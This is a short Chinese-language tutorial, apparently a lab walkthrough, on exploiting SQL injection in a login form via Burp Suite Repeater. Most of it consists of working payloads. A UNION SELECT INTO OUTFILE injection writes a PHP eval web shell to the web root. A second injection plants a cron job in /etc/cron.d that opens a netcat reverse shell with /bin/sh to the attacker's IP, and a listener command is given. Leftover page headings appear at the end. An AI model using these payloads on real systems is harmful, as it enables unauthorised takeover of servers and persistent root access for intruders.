啟動burpsuite監聽網頁
在監聽到的頁面右鍵點選Send to Repeater

然後跳轉到Repeater
在輸入框輸入【 ‘ "】
測試是否存在注入點
對username,password進行一個個試。如果存在會傳回界面會不一樣。
當我們找到注入點
可以進行字元串猜解長度可以了解為是按照一列一列的檢視密碼的長度。
‘order by 4# 報錯
‘order by 3#頁面正常
有3個字段
‘union select “”,””,”<?php eval($_GET[cmd]);?>” into outfile “/var/www/888.php”#
将php代碼寫入/var/www/html下的888。php
union一個操作符,必須SELECT語句組成。
/var/www/html網頁檔案的路徑
into outfile導出多行資料,檔案名必須全路徑(絕對路徑)
dumpfile功能一樣但是隻能導出一行資料
一句話木馬詳細解析
寫一句話木馬(基本操作)
得到webshell
whereis 檢視指令的路徑
檢視nc指令的絕對路徑
注目前此linux版本存在nc漏洞,可根據版本更改
更多漏洞
傳回/usr/bin/nc.traditional
設定定時任務反彈shell
‘union select “”,””,”* * * * * root /usr/bin/nc.traditional kail的IP 監聽端口 –c /bin/sh ” into outfile “/etc/cron.d/666”#
解析* * * * *分别對應 分 時 日 月 周
這裡利用的linux的系統定時任務
開啟監聽!!
一定要監聽
nc -nlvp 監聽端口等待一分鐘後回彈。預設五個*是一分鐘
直接連接配接
通過sys.exec指令來執行指令。
‘union select “”,””,”sys.exec(/usr/bin/nc.traditional –c /bin/sh kail的IP 監聽端口)”#
其他注入
03以上老版本使用